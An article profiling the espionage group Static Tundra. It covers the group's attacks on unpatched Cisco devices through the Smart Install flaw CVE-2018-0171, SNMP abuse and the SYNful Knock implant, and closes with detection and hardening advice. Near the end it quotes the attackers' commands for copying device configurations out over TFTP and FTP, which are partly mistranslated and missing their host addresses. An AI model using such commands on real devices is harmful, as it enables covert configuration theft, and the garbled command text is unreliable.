21.02.2024
3 min
1227
The article reveals the mechanics of Static Tundra attacks — how attackers exploit known vulnerabilities and unprotected, end-of-life devices to gain covert and long-term access to networks. Readers will learn about the main penetration vectors, typical signs of compromise in logs and traffic, and the tools used by attackers to steal configurations and intercept traffic.
Static Tundra is believed to be a Russian state-sponsored cyber-espionage group that focuses on hacking network equipment to infiltrate systems for extended periods of time and gain access to structures critical to Russian government interests. Static Tundra is likely a sub-cluster of another group, “Energetic Bear” (also known as BERSERK BEAR), based on common tactics, methods, and procedures (TTPs) and victimology that have been confirmed by the FBI. Energetic Bear was linked to the Center 16 unit of the Russian Federal Security Service (FSB) in a 2022 indictment by the U.S. Department of Justice. There is reason to believe that Static Tundra is linked to the historical use of “SYNful Knock,” a malicious implant installed on compromised Cisco devices, which was publicly reported in 2015.
Static Tundra is considered a highly skilled cyber group that has been operating for over a decade and has conducted long-term espionage operations. Static Tundra specializes in network intrusions, as evidenced by the group’s deep knowledge of network devices and the use of specialized tools, possibly including the new but decade-old SYNful Knock router implant.
Static Tundra targets unpatched and often compromised network devices to gain access to primary targets and support secondary operations against associated targets of interest. After establishing initial access to a network device, Static Tundra penetrates deeper into the target environment, compromising additional network devices and creating channels for long-term security and intelligence collection. This is demonstrated by the group’s ability to maintain access to target environments for several years without being detected.
For years, Static Tundra has compromised Cisco devices by exploiting a previously discovered vulnerability in the Smart Install feature of Cisco IOS and Cisco IOS XE software (CVE-2018-0171), which has remained unpatched, often after the devices have failed. The goal of this campaign is to extract device configuration data in bulk, which can then be used as needed to further the strategic goals and interests of the Russian government. This is evidenced by Static Tundra’s adaptation of its operations and changing its operational focus in line with evolving priorities.
Since its initial detection in 2015, Static Tundra has targeted organizations in the telecommunications, higher education, and manufacturing sectors. Victims are primarily located in Ukraine and allied countries, but also include other organizations around the world. Static Tundra is likely to continue operating against networks of organizations that are strategically important to Russian interests, particularly in the manufacturing and higher education sectors. The political target, as before, will remain Ukraine and the countries that support it.
Static Tundra has been observed to primarily target organizations in the telecommunications, higher education, and manufacturing sectors, shifting over time in line with changes in Russia’s strategic interests. Known victims span multiple geographic regions, including North America, Asia, Africa, and Europe.
With the start of the full-scale war against Ukraine, Static Tundra’s activity has increased dramatically, with the group ramping up operations against Ukrainian entities and maintaining a high level of attacks to this day. While previously more selective and limited activity was observed, compromises of organizations across sectors are now being recorded, indicating a significant expansion of targets.
Static Tundra’s two key operational objectives are: first, to compromise network devices to extract sensitive configurations that can be used to prepare future operations; secondly, establishing permanent covert access to networks for long-term espionage, consistent with Russia’s strategic interests. Due to the widespread presence of Cisco infrastructure, the emphasis is on exploiting such devices and applying special tools aimed at security and stealth on outdated or non-updated peripherals.
Since at least 2021, there has been aggressive exploitation of the Static Tundra vulnerability CVE-2018-0171, a known and patched vulnerability in Cisco IOS and Cisco IOS XE software that could allow an unauthenticated remote attacker to reboot an affected device, causing a denial of service (DoS), or execute arbitrary code on the affected device.
Cisco released a patch for CVE-2018-0171 in 2018. As previously reported by Cisco, customers are strongly encouraged to install the patch immediately, given the active and persistent exploitation of this vulnerability by sophisticated state-based Active Persistent Threat (APT) groups. Devices that have reached the end of their service life and cannot support the patch require additional security measures, as outlined in the 2018 Security Advisory. Unpatched devices with Smart Install enabled will remain vulnerable to these and other attacks until customers take action.
Static Tundra is believed to be using specially designed tools to automate the exploitation of CVE-2018-0171 and then download configurations from a pre-selected set of target IP addresses, likely collected through public scanning services (such as Shodan or Censys). The process is similar to those publicly reported in red team blogs and similar publications.
After gaining initial access through the Smart Install vulnerability, Static Tundra’s CVE-2018-0171 attack chain continues by issuing a command that modifies the running configuration and enables the local Trivial File Transfer Protocol (TFTP) server:
tftp-сервер nvram:startup-config
This allows Static Tundra to establish a subsequent connection to the newly created TFTP server to retrieve the startup configuration. The extracted configuration may reveal credentials and/or SNMP (Simple Network Management Protocol) community strings, which can then be used to more directly access the system.
Static Tundra has also been observed to gain initial access to devices via SNMP using a community string that was either compromised in a previous attack or guessed. In some cases, the group used unsecured community strings of “anonymous” and “public” with read and write permissions.
After gaining initial access to the target environment, Static Tundra interacts with the SNMP service using community strings that were compromised during the initial access phase. In some cases, Static Tundra spoofs the source address of SNMP traffic. This method allows an attacker to obfuscate their infrastructure and bypass access control lists (ACLs) because SNMP does not use session establishment. SNMP offers a variety of further execution options on a compromised device, such as executing commands directly, modifying the running configuration, and removing the current running configuration or startup configuration.
Static Tundra uses SNMP to send instructions to download a text file from a remote server and add it to the running configuration. This can provide additional means of access through newly created local user accounts in conjunction with enabling remote services, including TELNET.
Due to the relatively static nature of network environments, Static Tundra often relies on compromised SNMP community strings and credentials to maintain access to systems for several years. In some cases, Static Tundra creates privileged local user accounts and/or additional SNMP community strings for read and write.
Static Tundra has been observed using a Cisco IOS firmware implant known as SYNful Knock to gain persistent access to compromised systems. SYNful Knock is a modular implant that attackers inject into a Cisco IOS image and then load onto a compromised device. This provides a stealthy means of access that persists across reboots. Remote access to the device can be gained by sending a specially crafted TCP SYN packet, commonly referred to as a “magic packet.” More information, including a full technical description, can be found in a 2015 blog post published by Mandiant, with additional details from a 2015 Cisco blog post .
Static Tundra has been observed modifying the TACACS+ configuration on compromised devices, preventing remote logging capabilities. Static Tundra also modifies access control lists (ACLs) to allow access from specific IP addresses or ranges under its control.
Static Tundra likely uses publicly available scan data from services such as Shodan or Censys to identify systems of interest. Once in a target environment, Static Tundra relies heavily on its own commands, such as “show cdp neighbors”, to discover additional systems of interest in the target environment. This offers a relatively stealthy way to identify additional targets without the need for active scanning.
One of Static Tundra’s primary actions on targets is to capture network traffic that may be valuable from an intelligence perspective. To achieve this goal, Static Tundra establishes Generic Routing Encapsulation (GRE) tunnels that redirect traffic of interest to an attacker-controlled infrastructure, which can then be captured and further analyzed. Static Tundra has also been observed to collect and extract NetFlow data on compromised systems, revealing information about the source and destination of flows that may be of interest.
Static Tundra extracts configuration information in a variety of ways, including inbound TFTP connections via the Smart Install exploit procedure mentioned in the “Initial Access” section, outbound TFTP or FTP connections from a compromised device to an attacker-controlled infrastructure, and inbound SNMP connections via the configuration copy process.
Static Tundra uses special SNMP tools and functionality provided by the CISCO-CONFIG-COPY-MIB to extract configurations from compromised devices via TFTP or Remote Copy Protocol (RCP).
Static Tundra has been observed using the following commands to extract configuration files via TFTP and FTP:
показати конфігурацію запуску | перенаправити tftp://:/conf_bckp скопіювати running-config ftp://користувач:пароль@/output.txt
It is recommended to implement a set of measures to detect suspicious activity that may indicate the involvement of devices in this campaign:
Implement comprehensive configuration management (including auditing) according to best practices.
Conduct comprehensive monitoring of authentication, authorization, and command issuance.
Monitor syslog and AAA logs for unusual activity, including a decrease in normal logging events or gaps in logged activity.
Monitor your environment for unusual changes in behavior or configuration.
Profiling (NetFlow fingerprinting and port scanning) of network devices for surface appearance changes, including new port openings/closings and ingress/egress (non-passing) traffic.
Where possible, develop NetFlow visibility tools to detect unusual volume changes.
Look for non-empty or unusually large .bash_history files.
Additional identification and discovery can be performed using Cisco forensic guides.
The following strong recommendations apply to businesses in all sectors.
Install the patch for CVE-2018-0171. Disable Smart Install as outlined in the advisory if patching is not possible.
Disable telnet and ensure that it is not available on any Virtual Teletypewriter (VTY) lines on Cisco devices by configuring all VTY partitions with the “transport input ssh” and “transport output none” options.
Disable the Cisco Smart Install service with the “no vstack” option for any device that cannot apply the available patch for CVE 2018-0171, and develop end-of-life management plans for technologies that are too old to be patched.
Use type 8 passwords for local credentials.
Use type 6 for TACACS+ key configuration.
Strictly adhere to security best practices, including updates, access control, user education, and network segmentation.
Stay up-to-date with U.S. government and industry security advisories and consider suggested configuration changes to mitigate the issues described.
Update devices as aggressively as possible. This includes updating current hardware and software to address known vulnerabilities and replacing hardware and software that has reached the end of its useful life. Choose strong passwords and community strings, and avoid default credentials.
Use multi-factor authentication (MFA).
Encrypt all monitoring and configuration traffic (e.g., SNMPv3, HTTPS, SSH, NETCONF, RESTCONF).
Lock down and closely monitor credential systems such as TACACS+ and any transit hosts.
Use AAA to prohibit configuration changes to key device security (e.g., local accounts, TACACS+, RADIUS).
Prevent and monitor leaks of administrative or unusual interfaces (e.g. SNMP, SSH, HTTP, HTTPS).
Disable all unencrypted web management capabilities.
Verify the existence and correctness of access control lists for all management protocols (e.g. SNMP, SSH, Netconf, etc.).
Centrally store configurations and push them to devices. DO NOT allow devices to be a trusted source of authentic information about their configurations.
The article examines in detail a long-running cyberespionage campaign associated with a group known as Static Tundra, which specializes in compromising network equipment (particularly Cisco devices) for the purpose of long-term covert access and collection of configuration and network data. The group’s key tactics and tools are described — exploitation of the Smart Install vulnerability (CVE-2018-0171), use of SNMP and TFTP to extract configurations, implementation of persistent access mechanisms (including the SYNful Knock implant), and methods of hiding traces by changing ACLs and logging settings. The victimology of attacks is also analyzed (mainly telecom, education, manufacturing, focus on Ukraine and its partners), and practical recommendations for detecting, preventing, and restoring the security of network devices are provided at the end.
